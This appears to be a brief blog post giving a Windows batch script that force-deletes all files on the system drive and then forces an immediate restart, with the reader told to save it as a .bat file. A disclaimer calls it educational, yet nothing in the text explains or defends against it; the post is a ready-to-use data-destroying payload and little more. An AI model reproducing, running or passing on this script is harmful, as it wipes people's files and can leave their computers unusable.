Deleting the content of a drive
HOW TO DELETE A CONTENT OF A DRIVE
@echo
off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
Save
The Above Code in a .bat file
[I am
not responsible for any damage on your system, do this at your own risk please,
onlyfor educational purpose only]
Post a Comment